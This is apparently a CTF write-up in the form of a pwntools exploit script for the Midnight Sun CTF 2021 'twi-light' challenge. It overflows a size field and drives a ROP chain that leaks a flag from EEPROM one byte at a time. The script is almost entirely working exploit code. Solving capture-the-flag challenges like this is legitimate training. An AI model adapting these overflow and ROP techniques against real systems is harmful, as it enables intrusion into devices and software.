# twi-light -- midnightsunctf 2021
# writeup by hgarrereyn

from pwn import *
context.log_level = 'error'

def exploit(rop):
    s = remote('twi-light-01.play.midnightsunctf.se', 1337)

    s.sendafter('[COMMAND] : ', 'new\n')
    s.sendafter('[NAME] : ', 'aaaa\n')
    s.sendafter('[CONTENT] : ', 'a' * 50)

    s.sendafter('[COMMAND] : ', 'new\n')
    s.sendafter('[NAME] : ', 'b' * 12)
    s.sendafter('[CONTENT] : ', 'aa\n')

    # Write multiple times so that we can use null bytes in the ropchain.
    # e.g:
    # aaaaaaaaa0xxx
    # aaaa0xxxx0xxx
    # xxxx0xxxx0xxx
    for i in range(len(rop)-1,-1,-1):
        if rop[i] == '\x00':
            prop = 'a' * (i+1) + rop[i+1:]

            s.sendafter('[COMMAND] : ', 'edit\n')
            s.sendafter('[ENTRY] : ', '4\n')
            s.sendafter('[NAME] : ', 'bbbb\n')
            s.sendafter('[CONTENT] : ', prop + '\n')
        elif i == 0:
            s.sendafter('[COMMAND] : ', 'edit\n')
            s.sendafter('[ENTRY] : ', '4\n')
            s.sendafter('[NAME] : ', 'bbbb\n')
            s.sendafter('[CONTENT] : ', rop + '\n')


    # Edit the third entry and overflow the name on top of the size indicator
    # for the contents. We will enter newlines to skip setting a new context so
    # that we don't accidentlly overwrite the size with something valid.
    s.sendafter('[COMMAND] : ', 'edit\n')
    s.sendafter('[ENTRY] : ', '3\n')
    s.sendafter('[NAME] : ', 'ffffffffffff')
    s.sendafter('[CONTENT] : ', '\n\n\n\n')

    # List will trigger a stack overflow and our ropchain.
    s.sendafter('[COMMAND] : ', 'list\n')

    # Parse a single byte from the output.
    s.recvuntil('TOTAL: 4\r\n')
    d = s.recv(1)
    s.close()

    return d

# Rop gadget that sets r24 (actually the same gadget twice)
def set_r24(r24):
    return '\x03\xeb' + chr(r24) + '\x03\xeb' + chr(0x1)

# These are twi-related functions already defined in the binary. We can just
# reuse the same functionality in our ropchain.
twi_start_byte = '\x04\x21'
twi_data_byte = '\x04\x46'
twi_read_byte = '\x04\x57'

# This sets r25 to 0 and then calls putchar.
f_putchar = '\x01\x1e'

# Read a single byte from the second EEPROM at address 0x6a.
def get_byte(idx):
    rop = ''

    rop += set_r24(0x6a) # twi write
    rop += twi_start_byte

    rop += set_r24(idx) # address
    rop += twi_data_byte

    rop += set_r24(0x6b) # twi read
    rop += twi_start_byte
    rop += twi_read_byte
    rop += f_putchar

    print(len(rop))
    t = exploit(rop)
    
    return t

flg = b''
for i in range(128):
    p = get_byte(i)
    flg += p
    print(flg)
